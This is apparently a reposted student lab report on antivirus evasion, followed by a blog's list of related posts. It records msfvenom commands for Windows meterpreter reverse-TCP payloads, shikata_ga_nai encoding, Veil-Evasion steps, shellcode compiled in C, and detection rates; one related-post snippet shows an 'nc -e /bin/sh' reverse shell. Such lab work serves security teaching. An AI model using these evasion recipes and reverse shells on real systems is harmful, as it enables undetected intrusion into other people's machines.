20145322《网络对抗技术》免杀原理与实践

最新推荐文章于 2023-03-30 12:22:03 发布
最新推荐文章于 2023-03-30 12:22:03 发布
阅读量124 收藏
点赞数
原文链接:http://www.cnblogs.com/HZW20145322/p/6624237.html
版权

20145322《网络对抗技术》免杀原理与实践

基础问题回答

(1)杀软是如何检测出恶意代码的?

基于特征码的检测

再就是根据该代码是否有恶意行为来判别,若有恶意的行为,我们就认为该代码是恶意代码。

(2)免杀是做什么?

通过改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术。

(3)免杀的基本方法有哪些?

改变特征码

对恶意代码进行加壳,或用其他语言(如veil-evasion)或编译器进行再编译,利用shellcode进行编码。

实践总结与体会

通过这次实验,我掌握了非常简单的避免查杀的方法,虽然这只是基本的攻击手段,但也让我发现我的QQ管家也不是完全靠得住的。要想避免被攻击,还是得先了解如何生成攻击。

离实战还缺些什么技术或步骤?

例如在实战中如何在靶机上注入后门程序并运行等,因为本次实验室靶机主动接受我们发送的后门,所以应该再学习如何主动把后门注入到靶机里的技术。

四、实践过程记录

msfvenom直接生成meterpreter可执行文件

已知 Windows IP为:192.168.1.112 kali IP为:192.168.1.118

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 PORT=5322 -f exe > test.exe命令生成meterpreter可执行文件test.exe

885288-20170326213914565-912306712.jpg

使用ncat将文件传输到windows主机之后,上http://www.virscan.org/这个网站检测一下有多少查毒软件可以将其查杀出来

885288-20170326213951815-470667206.jpg

扫描结果:53%的杀软(21/39)报告发现病毒

Msfvenom使用编码器生成meterpreter可执行文件

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.1.106 PORT=5322 -f exe > test1.exe命令生成编码过的可执行文件test1.exe,编码一次

885288-20170326214112533-1480091673.jpg

使用ncat将文件传输到windows主机后,再检测:

885288-20170326214137783-1299067970.jpg

扫描结果:56%的杀软(22/39)报告发现病毒

编码十次

885288-20170326214240143-1707533482.jpg

使用ncat将文件传输到windows主机后检测:

885288-20170326214308143-503060159.jpg

扫描结果:56%的杀软(22/39)报告发现病毒

由此可得对于编码这种免杀方法一般的杀毒软件都是可以防住的。

使用Veil-Evasion生成可执行文件

在Kali中打开veil-evasion:直接在输入veil-evasion

然后在menu里面输入以下命令来生成可执行文件:

use python/meterpreter/rev_tcp

set LHOST 192.168.1.118

generate

5322test

1

885288-20170326214453533-1640649066.jpg

检测如下:

885288-20170326214512408-1751643887.jpg

扫描结果:25%的杀软(10/39)报告发现病毒,有些杀软已经开始靠不住了。

使用C语言调用Shellcode

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118 LPORT=5322 -f c命令生成一个C语言shellcode数组

利用这个数组在Windows主机的vs平台下写shellcode

885288-20170326214724565-1500291407.jpg

在Kali下使用msf监听,运行刚刚编译生成的可执行文件,成功获取权限。

885288-20170326214743158-1365493178.jpg

用我的QQ管家查杀:

885288-20170326214816549-1097272065.jpg

很好·····杀不出来····

去网站试试

885288-20170326214907736-58780394.jpg

扫描结果:12%的杀软(5/39)报告发现病毒。更少了···反正QQ管家是靠不住了···

转载于:https://www.cnblogs.com/HZW20145322/p/6624237.html

bakang3514
关注
红蓝对抗之红队免杀开发实践
悦分享
08-04 1967
我们在这个加载程序中执行的beacon shellcode最终是一个需要在内存中执行的DLL。许多C2框架利用了Stephen Fewer的。解析加载DLL所需kernel32.dll WINAPI的地址(例如VirtualAlloc, LoadLibraryA等);将DLL及其相应的节写入内存中;建立DLL导入表,以便DLL可以调用ntdll.dll和kernel32.dll WINAPI;加载额外的库并解析其导入函数地址;调用DLL的入口点。...
杀毒与免杀技术详解---白嫖党福音
01-15 1851
0x01 简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑免杀进而实现我们渗透测试目的。 0x02 概念 2.1 免杀类别 简单总结下我知道的免杀类别: 一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个免杀,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描免杀
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 450
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
网络信息对抗基础概念
weixin_43047908的博客
04-29 5775
网络对抗:是指在信息网络环境中,以信息网络系统为载体,以计算机或计算机网络为目标,围绕信息侦察、信息干扰、信息欺骗、信息攻击,为争夺信息优势而进行的活动的总称。网络对抗的目的是获取和保持信息网络优势,掌握并确保网络空间的制信息权。 信息战:信息战是为夺取和保持制信息权而进行的斗争,亦指战场上敌对双方为争取信息的获取权、控制权和使用权,通过利用、破坏敌方和保护己方的信息系统而展开的一系列作战活动。 网络中心战:相对于传统的平台中心战而提出的一种新作战概念。网络中心战是通过各作战单元的网络化,把信息优势变为作战
生成对抗网络 | 原理及训练过程
热门推荐
Chile_Wang的博客
01-28 1万+
笔者将在本章给大家介绍生成对抗网络(Generative Adversarial Network)[4]。生成对抗网络在AI界书写了一个以假乱真的剧本。近年来AI换脸等技术火爆全球,离不...
20145203 盖泽双《网络对抗技术免杀原理实践
03-26 205
20145203 盖泽双《网络对抗技术》拓展之免杀原理实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? ①根据病毒的特征码 ②将可执行文件和收集的常见病毒库做对比。 ③观察可执行文件的行为。 (2)免杀是做什么? 采取一些手段使我们的病毒程序注入到靶机时,不被杀毒软件检查出来。可以正常运行以便于我们成功控制靶机。 (3)免杀的基本方法有哪些? 改变特征码 : ①加壳:压缩壳 ...
20145222《网络对抗免杀原理实践
weixin_33958366的博客
04-01 134
20145222黄亚奇《网络对抗免杀原理实践 知识点: 一、在一个已经感染了恶意代码的机器上如何找到病毒文件? 找到恶意代码才能对其分析,找到恶意代码文件就是就是分析的第一步,一般来讲,恶意代码运行必然会创建一个进程,而这个进程就是我们找到他的突破口,一个打开的进程,可以通过任务管理器、Process Explorer等来找到其映像文件的地址,这样就能找到恶意代码文件了 ...
20155310《网络对抗免杀原理实践
weixin_30725467的博客
04-11 102
20155310《网络对抗免杀原理实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。 基于行为:通过对恶意代码的观察、研究,有一些行为是恶意代码的共同行为,而且比较特殊。所以当一个程序在运行时,杀毒软件会监视其行为,如果发现了这...
免杀原理实践
cyuyan3hao的博客
04-08 1174
网络对抗技术实验三
20145328 《网络对抗技术免杀原理实践
weixin_34049948的博客
03-22 75
20145328 《网络对抗技术免杀原理实践 实践内容: (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧 (3)通过组合应用各种技术实现恶意代码免杀 (4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 基础问题回答 (1)杀软是如何检测出恶意代码的? 杀毒软件对于恶意软件的检测...
20145329 《网络对抗技术免杀原理实践
dgflxcwno867930904的博客
03-26 174
实践内容: (1)理解免杀技术原理(1分) (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(2分) (3)通过组合应用各种技术实现恶意代码免杀(1分) (4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分) 1.基础问题回答 杀软是如何检测出恶意代码的? 1.通过对文件代码的特征检测 2.通过对...
20204323太晓梅 网络对抗技术 exp3 免杀原理实践
m0_57567318的博客
03-30 285
但是黑客实现免杀的手段和技术还是不断进步的,我们还需要提高自己的安全意识,及时更新自己的杀毒防护软件,才能有效应对被免杀手段保护到的恶意程序。同时,由于免杀技术的存在,我们也应该认识到杀毒软件并不能保障100%的安全,因此我们平时也要提高安全意识,不随便下载和点击来历不明的文件,谨防恶意代码的攻击。查看错误提示显示是文件未找到,初步推测应该是执行加密加壳的程序所在的文件夹无法找到作为模板去加壳的文件,于是把文件复制到hyperion所在的目录下,但是仍然显示找不到文件。此时就能成功进行操作了。
Spring Boot Starter-kit:含多种技术应用,如数据库、认证机制,有应用结构.zip
11-14
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
包含 Spring Boot 等系列技术参考指南中文版及相关资源的仓库.zip
11-14
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
Unity3d 3D模型描边代码 懒人直接上代码
11-14
Unity3d 3D模型描边代码 懒人直接上代码
java毕业设计-基于SSM的超市管理系统【代码+部署教程】
11-14
原文链接:https://alading.blog.csdn.net/article/details/141710476 包含功能: 经理管理:负责经理信息维护与权限分配,确保管理层操作的安全性和高效性。 员工管理:管理员工信息,包括招聘、离职、考勤及权限设置,优化人力资源配置。 商品分类管理:对商品进行科学分类,便于商品检索与管理,提升顾客购物体验。 商品信息管理:维护商品详细信息,如名称、价格、描述等,确保信息准确无误。 商品入库管理:监控商品入库流程,记录库存变化,实现库存精准管理。 商品销售管理:处理销售事务,包括销售记录、退货处理,支持销售业绩分析。 缺货提醒管理:自动检测库存水平,及时发出缺货警告,保障商品供应连续性。 商品收银管理:处理交易结算,支持多种支付方式,确保收银过程快速准确。 供应商管理:维护供应商信息,评估合作效果,优化供应链,保证商品质量与供应稳定性。
MATLAB实现工业PCB电路板缺陷识别和检测【图像处理实战】 - 副本 (2).zip
11-14
MATLAB实现工业PCB电路板缺陷识别和检测【图像处理实战】项目详情请参见:https://handsome-man.blog.csdn.net/article/details/130493170 PCB板检测的大概流程如下:首先存储一个标准PCB板图像作为良好板材的参考标准,然后将待检测的PCB板图像进行处理,比较与标准PCB图像的差异,根据差异的情况来判断缺陷类型。 项目代码可顺利编译运行~
Jupyter_你是否曾经幻想过与自己的虚拟人交互现在使用PaddleAvatar您可以将自己的图像音频和视频转化为一.zip
11-14
Jupyter-Notebook
1991-2021年中国科技统计年鉴-最新数据发布.zip
最新发布
11-14
1991-2021年中国科技统计年鉴-最新数据发布.zip
掌握GAN:生成对抗网络原理实践教程
综上所述,‘GAN生成对抗网络入门与实战视频课程’通过理论与实战相结合的方式,深入浅出地教授GAN的原理和应用,旨在帮助学员快速入门并掌握GAN技术。无论你是对深度学习充满兴趣的初学者,还是希望在工作中应用GAN...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值